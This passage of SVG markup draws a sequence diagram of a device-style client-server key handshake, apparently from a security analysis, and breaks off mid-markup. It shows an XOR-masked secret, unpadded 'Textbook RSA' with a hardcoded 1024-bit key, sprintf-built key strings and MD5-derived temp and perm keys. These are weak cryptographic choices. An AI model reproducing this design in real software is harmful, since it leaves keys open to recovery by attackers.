xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.3164959255547" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 525.792497604 L 120.54290498200001 525.792497604 L 120.54290498200001 545.394741564 L 72.64306269 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(60.228308182,545.394741564) translate(-60.228308182,-545.394741564)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 72.793849182 539.111971064 L 60.228308182 545.394741564 L 72.793849182 551.677512064 Z"/></g></g><g><g><rect fill="white" stroke="none" x="156.10059441169236" y="568.012715364" width="292.6235894194238" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="158.36239179169235" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="199.99572690521774" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.262389502874" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 60.228308182 587.614959324 L 532.1817155528086 587.614959324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(544.5964700608085,587.614959324) translate(-544.5964700608085,-587.614959324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 581.332188824 L 544.5964700608085 587.614959324 L 532.0309290608085 593.897729824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="610.232933124" width="457.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="625.311582324" width="320.67358865648436" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="650.1693079349296" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="824.4359705325859" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="864.9026377078789" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="728.8859751102226" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 644.913826284 L 627.5290406608085 644.913826284 L 627.5290406608085 664.516070244 L 579.6291983688085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,664.516070244) translate(-567.2144438608085,-664.516070244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 658.2332997440001 L 567.2144438608085 664.516070244 L 579.7799848608086 670.798840744 Z"/></g></g><g><g><rect fill="white" stroke="none" x="592.5968366808086" y="687.1340440440001" width="312.47360696703123" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="702.2126932440001" width="367.3069309225671" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="717.2913424440001" width="319.1569260588281" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="700.7048283240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="841.9252997102226" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="878.6086340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="915.5419684113945" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="951.9253035249199" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="765.1752997102226" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 736.8935864040001 L 635.0683652608085 736.8935864040001 L 635.0683652608085 756.4958303640001 L 587.1685229688085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(574.7537684608085,756.4958303640001) translate(-574.7537684608085,-756.4958303640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 587.3193094608085 750.2130598640001 L 574.7537684608085 756.4958303640001 L 587.3193094608085 762.778600864 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="779.113804164" width="425.3069313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="794.192453364" width="409.67358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="809.271102564" width="364.4569291105859" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="824.349751764" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="839.4284009639999" width="400.72359170824217" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4812907225762" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="807.7979563719903" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="848.2646235472832" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="807.763237644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="749.9479617125664" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="837.920536044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="812.8646182067071" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608085 859.0306449240001 L 642.6076898608086 859.0306449240001 L 642.6076898608086 878.6328888840001 L 594.7078475688086 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,878.6328888840001) translate(-582.2930930608086,-878.6328888840001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 872.3501183840001 L 582.2930930608086 878.6328888840001 L 594.8586340608086 884.915659384 Z"/></g></g><g><g><rect fill="white" stroke="none" x="132.88757376611133" y="901.250862684" width="369.2069291105859" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="135.14937114611132" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.53270244493945" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="433.2660398472832" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 920.853106644 L 80.18238729 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(67.76763278199999,920.853106644) translate(-67.76763278199999,-920.853106644)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 80.33317378199999 914.5703361440001 L 67.76763278199999 920.853106644 L 80.33317378199999 927.135877144 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="943.4710804440001" width="354.3735918036096" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="958.5497296440001" width="369.65692796617674" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="973.628378844" width="135.99026431947877" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="636.9479578978692" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="641.6146244055901" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="785.9312900550042" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="621.2146262175713" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="795.7979544646416" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="729.1979617125664" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 993.2306228040001 L 642.6076898608086 993.2306228040001 L 642.6076898608086 1012.8328667640001 L 594.7078475688086 1012.8328667640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,1012.8328667640001) translate(-582.2930930608086,-1012.8328667640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 1006.5500962640001 L 582.2930930608086 1012.8328667640001 L 594.8586340608086 1019.115637264 Z"/></g></g><g><g><rect fill="white" stroke="none" x="93.150025602" y="1035.450840564" width="339.22359743028807" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1050.529489764" width="295.4069260588281" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1065.6081389639999" width="321.3236001959436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1080.6867881639998" width="320.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1095.7654373639998" width="343.94026651292967" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1110.8440865639998" width="174.80692615419557" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="95.411822982" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="107.26182336346973" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> the Client possesses the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="295.8784920646416" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="401.09515923993456" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, or,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1064.100274044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">perhaps, a database of such keys, each</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">indexed by an </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.74515885846483" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="407.54516191022265" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1094.2575724439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then they may now proceed to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="281.14516038434374" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and store  the result</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="116.71182221906055" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.0284878684746" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 67.76763278199999 1130.4463305240001 L 135.621554182 1130.4463305240001 L 135.621554182 1150.048574484 L 87.72171189000001 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(75.30695738200001,1150.048574484) translate(-75.30695738200001,-1150.048574484)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 87.872498382 1143.765803984 L 75.30695738200001 1150.048574484 L 87.872498382 1156.331344984 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1172.6665482839999" width="249.39026346117188" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1187.7451974839998" width="460.2569293013208" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1202.8238466839998" width="430.456932448446" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1217.9024958839998" width="100.89026346117187" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1232.9811450839998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1248.0597942839997" width="184.54025735765626" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1186.2373325639999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="787.5872809719903" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="803.6706149411065" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.1039473843438" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="879.1539466214043" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="895.2372805905205" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1022.0372836422783" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1028.7372834515436" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="788.820618374334" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="804.9039523434502" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="828.3372847866875" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="881.6206176113946" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.7039515805108" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1024.5039546322687" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1031.2039544415338" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1231.4732801639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1246.5519293639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1261.6305785639997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(Note the format string.)</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1267.662038244 L 650.1470144608086 1267.662038244 L 650.1470144608086 1287.264282204 L 602.2471721688086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1287.264282204) translate(-589.8324176608086,-1287.264282204)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1280.981511704 L 589.8324176608086 1287.264282204 L 602.3979586608086 1293.547052704 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1309.882256004" width="491.306927584707" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1324.960905204" width="436.6069253912561" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1340.039554404" width="96.22359170824218" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="710.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="747.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.3539473843438" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="942.9539458584649" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="979.8872802090508" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="849.3206145596367" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="924.2539489102227" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="961.1872832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1037.3539473843439" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1353.610338684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 589.8324176608086 1359.6417983640001 L 650.1470144608086 1359.6417983640001 L 650.1470144608086 1379.244042324 L 602.2471721688086 1379.244042324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1379.244042324) translate(-589.8324176608086,-1379.244042324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1372.961271824 L 589.8324176608086 1379.244042324 L 602.3979586608086 1385.526812824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1401.862016124" width="364.50693216234373" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1416.940665324" width="233.90692891985108" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1432.019314524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1447.097963724" width="358.4235962858789" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1462.176612924" width="271.9569329252832" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1477.255262124" width="359.02360429674314" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1492.333911324" width="388.7736023893945" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1507.412560524" width="387.0569313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1522.4912097239999" width="101.60693063646484" 